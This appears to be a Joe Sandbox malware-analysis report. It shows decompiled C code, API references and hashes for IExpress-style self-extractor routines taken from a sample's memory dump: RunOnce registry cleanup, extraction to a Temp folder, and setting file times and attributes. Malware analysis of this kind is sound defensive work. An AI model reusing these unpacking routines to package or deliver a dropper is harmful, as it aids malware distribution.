Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-3699071305
Opcode ID: 990bfc51ef4dcc3b356b8d001e8f99fe8d2a9d81af48b97985f949bc099933b3
Instruction ID: a0ac406fb510b9675a1d8a52de715155d62c34f74af8db34af83790c1f18f2f7
Opcode Fuzzy Hash: 990bfc51ef4dcc3b356b8d001e8f99fe8d2a9d81af48b97985f949bc099933b3
Instruction Fuzzy Hash: 0921C039528604DBDB30AF60ED09F6E77B8BB56798F050159E882526A2DFF05C88EB41

Uniqueness

Uniqueness Score: -1.00%

Function 00941FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00941FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x948530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00941fee
0x00942005
0x0094200d
0x00942017
0x00000000
0x00942020
0x0094200d
0x00942029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0094538C,?,?,0094538C), ref: 00942005
RegDeleteValueA.KERNELBASE(0094538C,wextract_cleanup1,?,?,0094538C), ref: 00942017
RegCloseKey.ADVAPI32(0094538C,?,?,0094538C), ref: 00942020

Strings

wextract_cleanup1, xrefs: 00941FE7, 0094200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00941FFB

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
API String ID: 849931509-1592051331
Opcode ID: 00b4d3af6e60ba398937cf31b685540c05a3e7931eacecae5b573868d6cd52f2
Instruction ID: 791e102518baf5c6e238f04325056f0a69d8ffd3ceb562aade572dc62d87f18f
Opcode Fuzzy Hash: 00b4d3af6e60ba398937cf31b685540c05a3e7931eacecae5b573868d6cd52f2
Instruction Fuzzy Hash: A1E04F345A8318BBE7219B90EC0AF5E7B6DF742744F100194F904A0061EB615E14E715

Uniqueness

Uniqueness Score: -1.00%

Function 00944CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00944CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x948004; // 0xec518a5e
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x9491d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00944E99(_t75);
						L35:
						return E00946CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x948584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x9491e4;
						_t58 = 0x9491e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x9491e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x9491e4;
						_t30 = E00944702( &_v268, 0x9491e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0094476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00944980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E009447E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x9493f4 =  *0x9493f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x9491e4;
						_t63 = 0x9491e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x9491e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x9491e4;
						_t30 = E00944702( &_v268, 0x9491e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00944C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00944B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00944B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00944cd0
0x00944cdb
0x00944ce0
0x00944ce2
0x00944cee
0x00944cf2
0x00944d0e
0x00944d0e
0x00944d11
0x00944e83
0x00944e88
0x00944e98
0x00944e98
0x00944d17
0x00944d17
0x00944d1a
0x00944d2f
0x00944d2f
0x00000000
0x00944d2f
0x00944d1c
0x00944d1c
0x00944d1f
0x00944dcb
0x00944dd0
0x00944dd2
0x00944ddd
0x00944ddd
0x00944de3
0x00944de8
0x00944ded
0x00944ded
0x00944def
0x00944df0
0x00944df0
0x00944df4
0x00944df4
0x00944df6
0x00944df9
0x00944dfc
0x00944dfc
0x00944dfe
0x00944dff
0x00944dff
0x00944e03
0x00944e08
0x00944e0a
0x00944e0f
0x00944d03
0x00944d03
0x00000000
0x00944d03
0x00944e18
0x00944e20
0x00944e25
0x00944e27
0x00000000
0x00000000
0x00944e33
0x00944e38
0x00944e3a
0x00000000
0x00000000
0x00944e40
0x00944e51
0x00944e56
0x00944e5b
0x00944e5e
0x00000000
0x00000000
0x00944e6a
0x00944e6f
0x00944e71
0x00000000
0x00000000
0x00944e77
0x00944e7d
0x00000000
0x00944e7d
0x00944d25
0x00944d25
0x00944d28
0x00944d36
0x00944d3b
0x00944d40
0x00944d40
0x00944d42
0x00944d43
0x00944d43
0x00944d47
0x00944d4a
0x00944d4a
0x00944d4c
0x00944d4f
0x00944d4f
0x00944d51
0x00944d52
0x00944d52
0x00944d56
0x00944d5b
0x00944d5d
0x00944d62
0x00000000
0x00000000
0x00944d67
0x00944d6f
0x00944d74
0x00944d76
0x00000000
0x00000000
0x00944d7c
0x00944d84
0x00944d89
0x00944d8b
0x00000000
0x00000000
0x00944d94
0x00944d99
0x00944d9e
0x00944da1
0x00944daa
0x00944daa
0x00944da3
0x00944da3
0x00944da3
0x00944db5
0x00944dbb
0x00944dbd
0x00000000
0x00944dc3
0x00944dc5
0x00000000
0x00944dc5
0x00944dbd
0x00944d2a
0x00944d2a
0x00944d2d
0x00000000
0x00000000
0x00000000
0x00944d2d
0x00944cf8
0x00944cfd
0x00944d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00944DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00944DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00944D36, 00944DE3

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-3699071305
Opcode ID: 5d0a8f8f358648dbb64209643ed3a210514c73f9e7c679efbd6c7a5c1709e329
Instruction ID: 529c01b0945e004e5e9614a83295f75dbb6f44804ba8755b0ef54e14abb2f220
Opcode Fuzzy Hash: 5d0a8f8f358648dbb64209643ed3a210514c73f9e7c679efbd6c7a5c1709e329
Instruction Fuzzy Hash: 8F412436A046019BCF259F38DD44FFA73A9EB86308F144668E882972C5DE31FE4AC750

Uniqueness

Uniqueness Score: -1.00%

Function 00944C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00944C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x948d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x948d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00944c40
0x00944c4a
0x00944c8d
0x00000000
0x00944c70
0x00944c70
0x00944c7e
0x00944c86
0x00000000
0x00000000
0x00000000
0x00944c8a

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00944C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00944C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00944C7E

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 1cbdfa8ebeb3e3a3ac2abd58f43ef7921cc75eaf61d8e2adcaf8fd1e72b3b043
Instruction ID: b05fb8ffb0aefdded6ea34ac3b5276a5c02fb3bf6363d2ea5f2d1fcadb1834c2
Opcode Fuzzy Hash: 1cbdfa8ebeb3e3a3ac2abd58f43ef7921cc75eaf61d8e2adcaf8fd1e72b3b043
Instruction Fuzzy Hash: BFF0B476A1520CAF9B24DFB4CC88EFB77ADEB09342B48052BE855C1050FA30D914D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0094487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0094487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0094490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00944880
0x0094488c
0x00944894
0x009448a0
0x009448c9
0x009448ce
0x009448a2
0x009448a8
0x009448b7
0x009448bc
0x009448aa
0x009448ac
0x009448ac
0x009448a8
0x009448de
0x009448e7
0x0094490b
0x009448ee
0x009448f0
0x00000000
0x00944902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00944A23,?,00944F67,*MEMCAB,00008000,00000180), ref: 009448DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00944F67,*MEMCAB,00008000,00000180), ref: 00944902

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b1dfe9c8200cefd6baf5f40415348ed61b2d5b324ad8829faa62f70302ad2fcf
Instruction ID: 8bb97fe877f385c77cf6eaec1d5a4d2c311eb1984dfbad4e8360327a43555c1f
Opcode Fuzzy Hash: b1dfe9c8200cefd6baf5f40415348ed61b2d5b324ad8829faa62f70302ad2fcf
Instruction Fuzzy Hash: F4016DA3E2A57026F32440294C88FB7551CCBDAB39F1B0734BDEAE72D2D5644C0491E0

Uniqueness

Uniqueness Score: -1.00%

Function 00944AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00944AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x94858c; // 0x270
				_t9 = E00943680(_t20);
				if( *0x9491d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x948d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x949400; // 0x40200
							_t15 = _t14 + _t25;
							 *0x949400 = _t15;
							if( *0x948184 != 0) {
								_t21 =  *0x948584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x9493f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00944ad5
0x00944adb
0x00944ae7
0x00944aee
0x00944b05
0x00944b0d
0x00944b14
0x00944b1a
0x00944b1c
0x00944b21
0x00944b2a
0x00944b2f
0x00944b31
0x00944b39
0x00944b54
0x00944b54
0x00944b39
0x00944b2f
0x00944b0f
0x00944b0f
0x00944b0f
0x00944b5e
0x00944ae9
0x00944aed
0x00944aed

APIs

Part of subcall function 00943680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0094369F
Part of subcall function 00943680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436B2
Part of subcall function 00943680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00944B05

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: e3832b9dad793dec9afa605123bd1480de6a8b5e85f85609d8056763c472c52f
Instruction ID: 5338d73a9b713d315fc2544a0a018cf12084d778439c123a0ab49529340e168f
Opcode Fuzzy Hash: e3832b9dad793dec9afa605123bd1480de6a8b5e85f85609d8056763c472c52f
Instruction Fuzzy Hash: 5101B535255201ABD7188F68DC05FAB775DF746729F148225F939971F0CB70D812DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0094658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0094658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x948b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x948b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E009416B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00946592
0x00946594
0x00946596
0x00946598
0x00946598
0x0094659b
0x0094659b
0x0094659d
0x0094659e
0x009465a2
0x009465a4
0x009465a9
0x009465b2
0x009465b6
0x009465ba
0x009465c3
0x009465c5
0x009465c8
0x009465c8
0x009465c3
0x009465c9
0x009465cc
0x009465d2
0x009465d1
0x009465d1
0x00000000
0x009465dc
0x00000000

APIs

CharPrevA.USER32(00948B3E,00948B3F,00000001,00948B3E,-00000003,?,009460EC,00941140,?), ref: 009465BA

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 1159c8ab11db305ce99dbb9ae4eb97d015ed76a5f1fe95c1a78d403be499cf29
Instruction ID: bbfd6b28a6874737d7e803a2464d034e63a41458ffeb654f6696e461bda2d9c0
Opcode Fuzzy Hash: 1159c8ab11db305ce99dbb9ae4eb97d015ed76a5f1fe95c1a78d403be499cf29
Instruction Fuzzy Hash: 3CF04CB21082509BD331191D9884F67BFDE9BC7350F28056EF8DAC3205DA659C45C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 0094621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0094621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x948004; // 0xec518a5e
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0094597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E009444B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x949124 = E00946285();
					_t9 = 0;
				}
				return E00946CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00946229
0x00946230
0x00946247
0x0094626a
0x00946272
0x00946249
0x00946255
0x0094625f
0x00946264
0x00946264
0x00946284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0094623F

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 2bcf65a63372ca3626d91b118b42345426b3dcf37fe29c1055fc628b033adb2f
Instruction ID: f75e4572c4befcbb32aa324ee34eeeedfb2a8c203a15ee1111311df7d4ea0ae1
Opcode Fuzzy Hash: 2bcf65a63372ca3626d91b118b42345426b3dcf37fe29c1055fc628b033adb2f
Instruction Fuzzy Hash: EDF0E2B0718208BBE750EB749D02FBF37ACDB86300F40046AB986D6092EDB49D448651

Uniqueness

Uniqueness Score: -1.00%

Function 00944B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00944B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x948d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x948d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x948d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x948d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x948d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x948d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x948d6c)) = 0;
				return 0;
			}

0x00944b66
0x00944b74
0x00944b98
0x00944ba0
0x00000000
0x00944bac
0x00944ba4
0x00000000
0x00944ba4
0x00944b78
0x00944b7e
0x00944b84
0x00944b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00944FA1,00000000), ref: 00944B98

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5eb7007ddbb49fac873229c7e7e0cb9bc937aa3b7ff170d16668761c3d81cc6a
Instruction ID: 48d66ddb010021b5d969c915578f870fb27324b565daee9946a333cfde0bfd36
Opcode Fuzzy Hash: 5eb7007ddbb49fac873229c7e7e0cb9bc937aa3b7ff170d16668761c3d81cc6a
Instruction Fuzzy Hash: F9F01271D45B089E87719F39CC00E5BBBECEAD53603100A2ED46EE21D0FB30A441DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009466AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009466AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x009466b1
0x009466ba
0x009466c7
0x009466bc
0x009466be
0x009466be

APIs

GetFileAttributesA.KERNELBASE(?,00944777,?,00944E38,?), ref: 009466B1

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4bd22df701c910d7fc000299fbe43cdf7747e473a1b9623b54b339a03941ce7b
Instruction ID: b3b42f9d5855d5d17d42bf095c884195fdeb9705b125d891d453289fb5390de1
Opcode Fuzzy Hash: 4bd22df701c910d7fc000299fbe43cdf7747e473a1b9623b54b339a03941ce7b
Instruction Fuzzy Hash: 06B092BA276850426A2006716C299562945A6C363A7E51B94F032C01E0CA3EC846E005

Uniqueness

Uniqueness Score: -1.00%

Function 00944CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00944CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00944caa
0x00944cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00944CAA

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

